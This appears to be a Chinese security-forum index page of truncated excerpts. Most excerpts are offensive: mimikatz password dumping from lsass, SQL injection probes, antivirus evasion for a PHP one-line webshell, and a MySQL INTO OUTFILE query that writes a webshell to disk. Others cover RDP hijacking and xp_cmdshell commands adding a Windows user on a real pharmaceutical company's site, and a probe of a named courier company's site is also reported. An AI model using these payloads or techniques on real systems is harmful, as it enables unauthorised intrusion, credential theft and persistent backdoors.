mimikatz直接抓取 Windows 明文密码
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: 停止下载 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass 自己尝试了下用 win2008 ...
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: 停止下载 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass 自己尝试了下用 win2008 ...
ebycms是一套手机音乐cms系统 直接上代码 admin目录下的in.php <?php require_once('L:/wamp/www//fern.php'); Annotation("L:\wamp\www\eby\admin\in.php_0"); define(EBY_IN,TRUE); define('ADMIN_ROOT', str_replace("\","/",dir...
有时候我们注入的时候很难用and 1=1和 and 1=2来判断是否存在注入。。特别是像宽字节注入这种。。就比如说搜索型注入吧。。当存在宽字节注入时我们加上了%d5这样的。。数据库是查不到的。 这是我们就可以用延迟注入来判断 (当然or语句应该也是可以的,只是一点思路) 比如: word=%d5%27 and 1=1%23 word=%d5%27 and 1=2%23 是判断不出是否存在注入的,因...
现在网上流传很多防注入代码。这些真的有用吗?这是在网上找的一个防注入代码 例如: ''''--------定义部份------------------ Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr ''''自定义需要过滤的字串,用 "|" 分隔 Fy_In = "''''|;|and|exec|insert|select|delete|u...
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢? 首先我想到的是将eval从字符串类型赋给一个变量。 如:$func = 'phpinfo'; $func(); 这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果...
随便一个库执行: Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[dead])?>'); select cmd from a into outfile 'D:\www.webshell.cc.php'; Drop TABLE IF EXISTS xiaoma; 创建表A...
很多人对嗅探3389(远程桌面rdp协议)这一块,还是似懂非懂的,我就写了个总结文章,整理一下各种嗅探、劫持3389的方法,以及一些技巧经验大全,大杂烩,我尽量写得思路清晰一点,容易理解。 ------------------------------------------------------------------------------- 利用 Arp 欺骗、劫持、嗅探的方法: 0、直接使...
为防止遭恶意利用,不公开关键词,请作者理解 存在页面 AdminIncludecodeCode.asp AdminIncludemd5.asp 菜刀连接。 提示:该后门删除只要去掉这一行就可以了,对该程序官方表示BS 作者:CrackerMrX
刚才去申通快递官网查询一个邮件,点了一个链接,然后习惯性的检测了下,然后就发现了这个蛋疼的注入漏洞,如上图所示。 这是一个很明显的 Sql Inject,结构为:Asp + Mysql,而且这几个管理员密码居然还是明文的…… 后来又去检查了下其他页面,发现该站实际上到处都是注入漏洞,本人表示相当的无语…… 该程序缺陷已通知申通快递官方,请各位同学不要继续搞了,免引起不必要的麻烦。。。。。。 同时坐...
今天在网络上乱逛 不知道怎么的弹出一个修正药业的广告 点了进去就进修正的官方 在里面乱逛 看见一个注入 可是键入代码网页没有直接显示 我就丢到 Pangolin里面看看 果断的是注入点 后来验证是sa 是sa就太方便了 直接调用xp_cmdshell 上代码 ;exec master..xp_cmdshell"net user name password /add"-- ;exec master....